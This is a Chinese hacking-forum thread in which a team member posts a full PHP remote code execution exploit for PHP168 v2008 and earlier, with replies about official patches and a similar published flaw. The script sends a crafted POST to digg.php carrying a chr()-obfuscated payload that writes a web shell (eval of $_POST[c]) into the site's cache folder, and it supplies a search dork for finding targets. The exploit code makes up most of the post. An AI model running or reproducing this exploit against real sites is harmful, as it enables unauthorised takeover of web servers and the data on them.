You are not logged in.
欢迎cnryan同学加入狼族:-)
据可靠线报,有人已发现此相似漏洞[漏洞虽不一样,但在同一个文件,利用了相同的变量]并发在黑防上了,估计官方很快就会发布补丁了吧,那么我这个exp恐怕也会废掉了:)
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
Php168 <= v2008 remote code execution exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to php168
Example:
php '.$argv[0].' localhost /php168/
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$cmd = 'makehtml=1&chdb[htmlname]=${${fputs(fopen(chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(119).chr(111).chr(108).chr(118).chr(101).chr(122).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(112).chr(117).chr(114).chr(101).chr(116).chr(95).chr(116))}}';
$shell = 'http://'.$host.$path.'cache/wolvez.php';
/**
* wolvez.php has this code:
* <?eval($_POST[c])?>
*/
send($cmd);
if (!file_get_contents($url) && file_get_contents($shell) == 'puret_t')
exit("Expoilt Success!\nView Your shell:\t$shell\n");
else
exit("Exploit Failed!\n");
function send($cmd)
{
global $host, $path;
$message = "POST ".$path."digg.php HTTP/1.1\r\n";
// $message = "POST ".$path."login.php HTTP/1.1\r\n";
// $message = "POST ".$path."search.php HTTP/1.1\r\n";
// $message = "POST ".$path."sendpwd.php HTTP/1.1\r\n";
// $message = "POST ".$path."showsp.php HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Referer: http://$host$path\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $cmd;
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?>Offline
大家还是先本地玩玩吧,php168或许会一如既往的给我们带来惊喜:)
Offline
所谓的惊喜,是不是又像job.php那样补不干净啊?
哈哈,顶
Offline
恩 上次那个下载文件的漏洞 官方补了三四次吧 到现在还有问题:)
Offline
哈哈,好久没得杂志看了
黑防那个也是用的变量函数来利用的?
Offline
听某人说 黑防那个是写文件
Offline
eval函数出现在前面
写文件的出现在后面几行
估计那个作者要是看了这个exp会郁闷一下
Offline
Offline
08年的老东西了,不过今天在某地方看到了这个exp,很诧异这个怎么泄露出去的...
所以还是从内部转出来吧...
Offline